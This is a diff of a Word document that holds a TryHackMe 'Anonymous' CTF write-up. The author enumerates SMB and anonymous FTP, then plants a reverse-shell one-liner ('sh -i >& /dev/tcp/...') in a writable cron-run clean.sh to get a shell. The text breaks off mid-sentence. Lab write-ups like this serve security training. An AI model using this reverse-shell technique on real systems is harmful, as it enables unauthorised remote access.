--- a/THM_challenges/Medium/Anonymous/Anonymous_Solution_Documentation.docx
+++ b/THM_challenges/Medium/Anonymous/Anonymous_Solution_Documentation.docx
@@ -1,101 +1,74 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14 w15 wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Anonymous</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>_Solution_Documentation</w:t>
+        <w:t>Anonymous_Solution_Documentation</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Written By: Yuval Quina</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>I started this challenge by performing a Nmap scan:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="13EED98B" wp14:editId="4D1C6E81">
             <wp:extent cx="4902200" cy="5314950"/>
             <wp:effectExtent l="0" t="0" r="0" b="6350"/>
             <wp:docPr id="1" name="Picture 1"/>
@@ -112,7 +85,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId5"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -140,26 +113,25 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>While examining the scan results, I noticed the open SMB ports of 139 and 445. This led me to enumerate the shares of the target’s machine:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="56C82FDE" wp14:editId="58E12BCB">
             <wp:extent cx="5313045" cy="2348865"/>
             <wp:effectExtent l="0" t="0" r="8255" b="635"/>
             <wp:docPr id="2" name="Picture 2"/>
@@ -176,7 +148,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId6"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -204,45 +176,41 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Here I found the “pics” share (which seems to be quite unusual shared folder).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Then, I successfully logged-in to the FTP service using the username “anonymous” with no password:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5159E3E9" wp14:editId="00894155">
             <wp:extent cx="1987550" cy="1187450"/>
             <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
             <wp:docPr id="3" name="Picture 3"/>
@@ -259,7 +227,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -287,26 +255,25 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>After getting connected, I listed all the available files and folders:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2C9C0BA2" wp14:editId="797710B4">
             <wp:extent cx="3352800" cy="539750"/>
             <wp:effectExtent l="0" t="0" r="0" b="6350"/>
             <wp:docPr id="4" name="Picture 4"/>
@@ -323,7 +290,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -351,26 +318,25 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>And I noticed the folder “scripts” which contain these files:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="67C8C056" wp14:editId="1B879DE7">
             <wp:extent cx="3816350" cy="1073150"/>
             <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
             <wp:docPr id="5" name="Picture 5"/>
@@ -387,7 +353,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId9"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -415,26 +381,25 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>I downloaded them to my own machine and I opened each one:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3CC167A8" wp14:editId="62B26F79">
             <wp:extent cx="5271770" cy="2565400"/>
             <wp:effectExtent l="0" t="0" r="11430" b="0"/>
             <wp:docPr id="7" name="Picture 7"/>
@@ -451,7 +416,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -479,24 +444,20 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>to_do.txt:</w:t>
       </w:r>
@@ -504,18 +465,19 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="726B4DD2" wp14:editId="19955B77">
             <wp:extent cx="3530600" cy="425450"/>
             <wp:effectExtent l="0" t="0" r="0" b="6350"/>
             <wp:docPr id="8" name="Picture 8"/>
@@ -532,7 +494,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -560,32 +522,31 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>clean.sh:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="11E2A68C" wp14:editId="3F1BF2D2">
             <wp:extent cx="5225415" cy="1298575"/>
             <wp:effectExtent l="0" t="0" r="6985" b="9525"/>
             <wp:docPr id="9" name="Picture 9"/>
@@ -602,7 +563,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -627,51 +588,37 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Removed_files.log:</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2E3F3157" wp14:editId="4954A248">
             <wp:extent cx="2286000" cy="1701800"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="11" name="Picture 11"/>
@@ -688,7 +635,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -717,18 +664,14 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>I read the files’ content and understood that the clean.sh script suppose to clean up tmp files from the “/tmp” folder, but it won’t do so, because its value of “tmp_files” never changing from its initial value (0).</w:t>
       </w:r>
@@ -736,313 +679,890 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">At this point, </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>I chose to execute a reverse shell attack by changing the clean.sh file to execute this command</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sh -i &gt;&amp; /dev/tcp/10.9.1.122/4444 0&gt;&amp;1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">*Note that I first of all downloaded the clean.sh, then edited it and uploaded it back to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ftp server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AF22C53" wp14:editId="679B5E91">
+            <wp:extent cx="4038950" cy="769687"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="553081917" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="553081917" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4038950" cy="769687"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>And before uploading the file I created this netcat listener:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7059BED1" wp14:editId="3DFA45EC">
+            <wp:extent cx="3436918" cy="769687"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="356480685" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="356480685" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3436918" cy="769687"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">And after couple of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>seconds,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I got a shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">over the target machine </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(the clean.sh file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
